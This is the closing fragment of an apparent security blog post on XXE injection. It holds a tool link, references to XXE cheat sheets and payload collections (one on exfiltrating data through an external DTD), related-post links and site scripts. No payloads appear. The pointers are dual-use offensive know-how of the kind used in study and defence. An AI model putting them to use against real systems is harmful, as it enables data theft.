</code></pre></div></div> <h2 id="tools">Tools</h2> <p>https://github.com/luisfontes19/xxexploiter</p> <h2 id="references">References</h2> <ul> <li><a href="https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf">https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf</a></li> <li><a href="https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html">https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html</a></li> <li>Extract info via HTTP using own external DTD: <a href="https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/">https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/</a></li> <li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection</a></li> <li><a href="https://gist.github.com/staaldraad/01415b990939494879b4">https://gist.github.com/staaldraad/01415b990939494879b4</a></li> <li><a href="https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9">https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9</a></li> <li><a href="https://portswigger.net/web-security/xxe">https://portswigger.net/web-security/xxe</a></li> <li><a href="https://gosecure.github.io/xxe-workshop/#7">https://gosecure.github.io/xxe-workshop/#7</a></li> </ul> </div> </article> <br> <hr> <br> <ul class="list-disc pl-8"></ul> <h2 class="text-3xl font-semibold mb-4 mt-12">Enjoy Reading This Article?</h2> <p class="mb-2">Here are some more articles you might like to read next:</p> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2025/how-to-aproach-CTF's/">How to aproach CTF's</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2025/BruteForce/">Brute Force Attack</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2025/reversing-tools/">reversing tools</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2025/xssi-cross-site-script-inclusion/">XSSI</a> </li> <li class="my-2"> <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2025/linux/">Shells - Linux</a> </li> </div> </div> </div> </div> <footer class="fixed-bottom" role="contentinfo"> <div class="container mt-0"> --|[ &copy; 47z!Lu7h ]|----|[ Love is life. And if you miss love, you miss life. ]|----|[ Feb/2025 ]|-- </div> </footer> <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script> <script src="/assets/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/masonry-layout@4.2.2/dist/masonry.pkgd.min.js" integrity="sha256-Nn1q/fx0H7SNLZMQ5Hw5JLaTRZp0yILA/FRexe19VdI=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/imagesloaded@5.0.0/imagesloaded.pkgd.min.js" integrity="sha256-htrLFfZJ6v5udOG+3kNLINIKh2gvoKqwEhHYfTTMICc=" crossorigin="anonymous"></script> <script defer src="/assets/js/masonry.js?a0db7e5d5c70cc3252b3138b0c91dcaf" type="text/javascript"></script> <script src="/assets/js/tooltips-setup.js?53023e960fbc64cccb90d32e9363de2b"></script> <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.1.0/dist/medium-zoom.min.js" integrity="sha256-ZgMyDAIYDYGxbcpJcfUnYwNevG/xi9OHKaR/8GK+jWc=" crossorigin="anonymous"></script> <script defer src="/assets/js/zoom.js?85ddb88934d28b74e78031fd54cf8308"></script> <script defer src="/assets/js/bootstrap-toc.min.js?c82ff4de8b0955d6ff14f5b05eed7eb6"></script> <script src="/assets/js/no_defer.js?2781658a0a2b13ed609542042a859126"></script> <script defer src="/assets/js/common.js?e0514a05c5c95ac1a93a8dfd5249b92e"></script> <script defer src="/assets/js/copy_code.js?12775fdf7f95e901d7119054556e495f" type="text/javascript"></script> <script defer src="/assets/js/jupyter_new_tab.js?d9f17b6adc2311cbabd747f4538bb15f"></script> <script async src="https://d1bxh8uas1mnw7.cloudfront.net/assets/embed.js"></script> <script async src="https://badge.dimensions.ai/badge.js"></script> <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js" integrity="sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI=" crossorigin="anonymous"></script> <script src="/assets/js/mathjax-setup.js?70d799092f862ad98c7876aa47712e20"></script> <script defer src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6" crossorigin="anonymous"></script> <script defer src="/assets/js/progress-bar.js?2f30e0e6801ea8f5036fa66e1ab0a71a" type="text/javascript"></script> <script src="/assets/js/vanilla-back-to-top.min.js?f40d453793ff4f64e238e420181a1d17"></script> <script>
    addBackToTop();
  </script> <script type="module" src="/assets/js/search/ninja-keys.min.js?a3446f084dcaecc5f75aa1757d087dcf"></script> <ninja-keys hideBreadcrumbs noAutoLoadMdIcons placeholder="Type to start searching"></ninja-keys> <script src="/assets/js/search-setup.js?6c304f7b1992d4b60f7a07956e52f04a"></script> <script src="/assets/js/search-data.js"></script> <script src="/assets/js/shortcut-key.js?6f508d74becd347268a7f822bca7309d"></script> </body> </html>